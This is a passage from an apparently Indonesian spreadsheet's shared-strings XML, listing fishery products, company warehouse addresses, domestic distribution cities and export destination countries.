  <si>
    <t>Ikan Demersal Beku (Lencam, Kerapu, Layur, Bawal, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Purwakarta, Kota Bandung, Kota Bekasi, Kota Depok, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Lemuru, Tongkol, Kembung, Lemadang, Gindara, Salem, Selar)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Purwakarta, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kota Tangerang</t>
  </si>
  <si>
    <t>Ikan Bernilai Tambah Beku (Ikan Marinasi)</t>
  </si>
  <si>
    <t>Ruko 237 No.21, Kel. Sudiang, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Bream, Lencam, Kerapu, Kakatua, Kakap, Kaci-kaci, Barramundi)</t>
  </si>
  <si>
    <t>Hong Kong, Malaysia, Saudi Arabia</t>
  </si>
  <si>
    <t>Japan, Saudi Arabia</t>
  </si>
  <si>
    <t>Jl. KL Yos Sudarso KM 10,5 KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Belgium, France</t>
  </si>
  <si>
    <t>Penambulai, Kel. Warabal, Kec. Aru Tengah Selatan, Kabupaten Kepulauan Aru&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Samudera Nizam Zachman, Jl. Hiu Raya Blok D Kav No.4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Denmark</t>
  </si>
  <si>
    <t>Belgium, Singapore, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Lemadang, Marlin, Gindara, Layaran, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Belgium, Spain</t>
  </si>
  <si>
    <t>Belgium, Japan, United States</t>
  </si>
  <si>
    <t>Jl. Warujaya I Blok A No.117 RT 006 RW 022, Kel. Mekarjaya, Kec. Sukmajaya, Kota Depok&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Semarang, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t xml:space="preserve">Seafood Bernilai Tambah Beku (Kaki Naga, Siomay Ikan, Dimsum Ikan, Dimsum Udang) </t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Jl. RE Martadinata No.09 RT 005 RW 002, Kel. Opas Indah, Kec. Taman Sari, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>Jl. Udang Klademak I, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Surabaya, Kabupaten Raja Ampat, Kota Sorong</t>
  </si>
  <si>
    <t>China, United Kingdom, Viet Nam</t>
  </si>
  <si>
    <t>RT 05 RW 02, Kel. Ngerong, Kec. Gempol, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Semarang, Kabupaten Pasuruan, Kota Malang, Kota Pasuruan, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok S Kav No.12B RT 006 RW 017, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>China, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Malong, Gulama, Kerapu, Layur, Sukang, Bawal, Kakap, Baronang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Makerel Atlantik, Capelin, Kembung, Gindara, Salem, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Pluit Timur Blok C Timur No.11, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Barramundi, Bawal, Kerapu, Lencam, Janahan, Layur, Kakatua, Kakap, Baronang, Terisi, Lidah, Cunang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Bawal, Lencam, Kerapu, Layur, Kakatua, Kakap, Baronang, Terisi, Lidah, Cunang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Bonito, Tongkol, Marlin, Layaran, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Bonito, Tongkol, Marlin, Layaran, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Rajungan Hidup</t>
  </si>
  <si>
    <t>Jl. Daan Mogot Km 17 No.40, Kel. Kalideres, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kampung Permas, Dusun Montong Agung, Kel. Pare Mas, Kec. Jerowaru, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Mataram</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Pattene 88 Cluster Green Park Blok C18-C20, Kel. Temmappaduae, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>China, India, Japan, Korea, Democratic People's Republic of</t>
  </si>
  <si>
    <t>Jl. Trans Mala, Lingkungan IV Blok R No.15, Kel. Melonguane Timur, Kec. Melonguane, Kabupaten Kepulauan Talaud&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kerapu, Sukang, Kakatua, Kakap, Kurisi, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Lencam, Kerapu, Sukang, Kakatua, Kakap, Kurisi, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Malalugis, Lemadang, Marlin, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Barakuda, Malalugis, Lemadang, Marlin, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Brunei Darussalam, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kuniran, Kerapu, Malalugis, Kakatua, Pinjalo, Kakap, Kaci-kaci, Barramundi)</t>
  </si>
  <si>
    <t>Australia, Canada, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Russian Federation, United Arab Emirates, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Lencam, Kuniran, Kerapu, Kakatua, Pinjalo, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Australia, Canada, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Russian Federation, United Arab Emirates, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Cobia, Lemadang, Gindara, Cakalang, Tenggiri, Todak)</t>
  </si>
  <si>
    <t>Australia, Hong Kong, Korea, Democratic People's Republic of, United Arab Emirates, United States, Viet Nam</t>
  </si>
  <si>
    <t>Australia, Canada, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Russian Federation, United States, Viet Nam</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Russian Federation, United States, Viet Nam</t>
  </si>
  <si>
    <t>Australia, Canada, China, Hong Kong, Korea, Democratic People's Republic of, Russian Federation, United Arab Emirates, United States, Viet Nam</t>
  </si>
  <si>
    <t>Australia, Canada, China, Korea, Democratic People's Republic of, Russian Federation, United States, Viet Nam</t>
  </si>
  <si>
    <t>Australia, Canada, China, Hong Kong, Korea, Democratic People's Republic of, Russian Federation, United States, Viet Nam</t>
  </si>
  <si>
    <t>Japan, Russian Federation, United States</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Surabaya</t>
  </si>
  <si>
    <t>Switzerland</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Tenggiri, Cakalang, Baby Tuna)</t>
  </si>
  <si>
    <t>Jl. Pelantar Asam/KUD No.120, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Bawal, Kembung, Selar, Tamban, Benggol, Tenggiri)</t>
  </si>
  <si>
    <t>Kabupaten Lingga, Kota Batam, Kota Tanjung Pinang</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerisi, Manyung, Kerapu, Merah, Kakap, Kaci-kaci, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kabupaten Tuban, Kabupaten Gresik, Kota Surabaya</t>
  </si>
  <si>
    <t>Australia, Canada, China, Japan, Korea, Democratic People's Republic of, Russian Federation, United Kingdom, United States</t>
  </si>
  <si>
    <t>Jl. Irian Barat No.253 Pasar V, Kel. Sampali, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Malaysia, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Doversole, Lencam, Kuniran, Kerapu, Kakatua, Pinjalo, Kakap, Kaci-kaci, Guntur, Barramundi)</t>
  </si>
  <si>
    <t>Australia, Canada, China, Korea, Democratic People's Republic of, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Tenggiri, Cobia)</t>
  </si>
  <si>
    <t>Australia, Canada, China, France, Korea, Democratic People's Republic of, Russian Federation, United States, Viet Nam</t>
  </si>
  <si>
    <t>Canada, China, Japan, Korea, Democratic People's Republic of, Russian Federation, United States, Viet Nam</t>
  </si>
  <si>
    <t>Canada, China, France, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China, United Arab Emirates, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap Putih, Mata Besar, Bawal, Kerapu, Kakap, Kuro, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Teri, Barakuda, Tongkol, Kembung, Marlin, Tenggiri)</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Taiwan, Province of China</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Lemuru, Barakuda, Tongkol, Kembung, Marlin, Tenggiri)</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Malaysia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Malaysia, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>China, Japan, Malaysia, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>China, Malaysia, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Mata Besar, Kembung, Talang-talang, Sarden, Selar, Tenggiri)</t>
  </si>
  <si>
    <t>Pergudangan Fira 51, Jl. Kenjeran No.475-481 Kav 21No.40, Kel. Gading, Kec. Tambaksari, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Minyak Hati Hiu</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna IV No.8, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Marlin, Semar, Gindara, Layaran, Tenggiri, Todak, Tongkol)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Bawal, Sebelah, Senangin, Jahan)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Rembang, Kabupaten Pati, Kabupaten Jember, Kabupaten Banyuwangi, Kabupaten Situbondo, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>RT 11 RW VI, Dusun Muarah, Kel. Padelegan, Kec. Pademawu, Kabupaten Pamekasan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Medan, Kabupaten Lampung Selatan, Kota Jakarta Pusat, Kota Surakarta, Kota Surabaya, Kota Pontianak, Kota Balikpapan, Kota Samarinda, Kota Makassar</t>
  </si>
  <si>
    <t>RT 05 RW 01, Dusun Craken, Kel. Sumberharjo, Kec. Pacitan, Kabupaten Pacitan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Kaki Naga, Tahu Bakso Ikan) </t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Pacitan, Kabupaten Ponorogo, Kabupaten Magetan, Kota Surabaya</t>
  </si>
  <si>
    <t>Japan, Korea, Republic of, Russian Federation, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Lemadang, Marlin, Gindara, Salem, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal Hitam, Lencam, Kerapu, Sukang, Kakap Merah, Ekor Kuning)</t>
  </si>
  <si>
    <t>Jl. Poros Wandoka Lingkungan Antapia, Kel. Wandoka Utara, Kec. Wangi-wangi, Kabupaten Wakatobi&lt;br&gt;Sulawesi Tenggara</t>
  </si>
  <si>
    <t>China, Malaysia, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal, Gulama, Lencam, Angoli, Kerapu, Layur, Kakap, Kurau)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Bawal, Gulama, Lencam, Angoli, Kerapu, Layur, Kakap, Kurau)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Gabus Laut, Marlin, Gindara, Muroaji, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Muara Angke Blok C No.6, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Room 2 Gudang 77 Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Tuna IV, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Room 1 Gudang 77 Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Tuna IV, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demesal Beku (Sebelah, Kerapu, Monkfish, Kakap, Baronang, Seabass)</t>
  </si>
  <si>
    <t>Jl. Raya Cangkir Km 21 No.302G, Kel. Cangkir, Kec. Driyorejo, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Irawan Matress No.18 Batu Lipai, Kel. Baran, Kec. Meral, Kabupaten Karimun&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemuru, Mata Besar, Tongkol, Gabus Laut, Puput, Senangin, Kembung, Talang-talang, Sarden, Selar, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Malong, Bawal, Anggoli, Kerapu, Gerot-gerot, Layur, Ungar, Merah, Kakap, Kaci-kaci, Kurau, Parang-parang)</t>
  </si>
  <si>
    <t>Taman Pergudangan dan Perkantoran Muara Baru, Jl. Muara Baru Raya No.30 Blok C7 - C8, Kel. Penjaringan, Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Utara, Kabupaten Karawang, Kota Bogor, Kota Bekasi, Kabupaten Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal, Gulama, Layur, Kakap, Kuro, Alaska Pollock, Sauri Pasifik)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Karawang, Kabupaten Bekasi, Kabupaten Tangerang, Kabupaten Serang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tude, Tongkol, Deho, Kembung, Maesang, Layang, Cakalang, Salem)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Karawang, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kabupaten Tangerang, Kota Tangerang, Kota Serang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Utara, Kabupaten Sukabumi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Jl. Raya Mundupesisir No.34, Kel. Mundupesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>China, France</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Jengot, Kakap)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Tembang, Kembung, Tenggiri)</t>
  </si>
  <si>
    <t>Pergudangan 88, Jl. Pesing Poglar No.76A, Kel. Kedaung Kali Angke, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Deho, Selar, Layang, Cakalang, Benggol, Salem)</t>
  </si>
  <si>
    <t>Jl. Wisata Bahari No.8 KM 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Jl. Letjen Gatot Subroto No.106, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Algeria, Mexico, Portugal, Spain, Thailand</t>
  </si>
  <si>
    <t>Philippines, Thailand</t>
  </si>
  <si>
    <t>Jl. Lebak Rejo III A No.03 RT 003 RW 006, Kel. Dukuh Setro, Kec. Tambak Sari, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Malong, Layur, Bawal, Perak-perak)</t>
  </si>
  <si>
    <t>Jl. Pandanaran No.57 RT 001 RW 002, Kel. Randusari, Kec. Semarang Selatan, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Kawasan Industri Candi Blok 22A, Jl. Gatot Subroto, Kel. Ngaliyan, Kec. Ngaliyan, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Jl. Raya Perancis Gudang 9 Blok BG - BH Room 1, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Salem, Selayang, Sarden, Tenggiri)</t>
  </si>
  <si>
    <t>China, India, Japan, Philippines, Viet Nam</t>
  </si>
  <si>
    <t>Pergudangan Logistik Terpadu Pelitagro Blok A No.15, Jl. Ir. Sutami No.24, Kel. Parangloe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>China, India, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Letjend Gatot Subroto, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Korea, Democratic People's Republic of, Malaysia, Thailand</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Semarang, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan, Kota Denpasar, Kota Palangka Raya, Kota Banjarmasin, Kota Balikpapan, Kota Samarinda, Kabupaten Wakatobi, Kabupaten Sorong, Kota Sorong</t>
  </si>
  <si>
    <t>American Samoa, Brunei Darussalam, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, United States, Viet Nam</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Semarang, Kota Semarang, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan, Kota Denpasar, Kota Palangka Raya, Kota Banjarmasin, Kota Balikpapan, Kota Samarinda, Kabupaten Wakatobi, Kabupaten Sorong, Kota Sorong</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Teri, Baby Tuna, Tongkol, Lemadang, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Surabaya, Kabupaten Badung</t>
  </si>
  <si>
    <t>Jl. Sukomanunggal No.179 Blok F2-F3, Kel. Sukomanunggal, Kec. Sukomanunggal, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Baturusa Desa Serandang, Kel. Baturusa, Kec. Merawang, Kabupaten Bangka&lt;br&gt;Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Kod, Doversole, Lencam, Kerapu, Kakap, Bawal, Pollack Alaska, Haddock)</t>
  </si>
  <si>
    <t>Canada, Indonesia, Singapore, United States</t>
  </si>
  <si>
    <t>Jl. Raya Sumorame No.39, Kel. Sumorame, Kec. Candi, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kerupuk Sotong</t>
  </si>
  <si>
    <t>Pergudangan Safe N Lock Blok O 1737 Jl. Lingkar Timur, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Gulama, Kerapu, Layur, Kakatua, Bawal, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Surabaya, Kota Denpasar, Kota Pontianak, Kota Makassar</t>
  </si>
  <si>
    <t>Kabupaten Gresik, Kota Pasuruan, Kota Surabaya, Kota Pontianak, Kota Makassar</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Surabaya, Kota Palu, Kota Makassar, Kabupaten Sorong</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Pontianak, Kota Makassar, Kabupaten Sorong</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Surabaya, Kota Pontianak, Kota Balikpapan, Kota Makassar, Kabupaten Sorong</t>
  </si>
  <si>
    <t>Jl. Udang Blok M No.7 (Room 2), Kawasan Pelabuhan Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bekasi, Kota Depok, Kota Tangerang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Lemadang, Cakalang, Tenggiri, Salem)</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Depok, Kota Tangerang</t>
  </si>
  <si>
    <t>Oman, Thailand</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal, Kerapu, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bekasi, Kota Depok</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Depok, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Bekasi, Kota Depok, Kota Tangerang</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Rorotan IV No.189 RT 004 RW 010, Kel. Rorotan, Kec. Cilincing, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Bogor, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Bogor, Kabupaten Bekasi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Tepung Alga Spirulina</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Barramundi, Kakap)</t>
  </si>
  <si>
    <t>Brunei Darussalam, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Setia Budhi RT 004 RW 001, Kel. Sungai Lakam, Kec. Karimun, Kabupaten Karimun&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Malong, Manyung, Anggoli, Kerapu, Gerot-gerot, Merah, Kaci-kaci, Kurau, Layur)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Talang-talang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Kampung Baru No.74 RT 004 RW 002, Kel. Sungai Lakam Timur, Kec. Karimun, Kabupaten Karimun&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Malong, Manyung, Anggoli, Kerapu, Layur, Kurau, Merah, Kaci-kaci)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Talang-talang, Tenggiri, Tongkol, Selar)</t>
  </si>
  <si>
    <t>Dusun Otasek, Kel. Tanjung, Kec. Pademawu, Kabupaten Pamekasan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Bangkalan, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Prof. Dr. Ir. Sutami No.22, Kel. Tamalanrea, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Dusun VII, Kel. Naga Kisar, Kec. Pantai Cermin, Kabupaten Serdang Bedagai&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Canada, Singapore, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Nila Bernilai Tambah Beku (Daging Perut Nila, Daging Dagu Nila, Tetelan Daging Nila, Kulit Nila, Sisik Nila, Tulang Dagu Nila)</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Pusat</t>
  </si>
  <si>
    <t>Austria</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Surabaya</t>
  </si>
  <si>
    <t>Hong Kong, Japan, Singapore, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Lemuru, Deho, Lemadang, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Lemadang, Cakalang)</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Baby Tuna, Tongkol, Lemadang, Cakalang)</t>
  </si>
  <si>
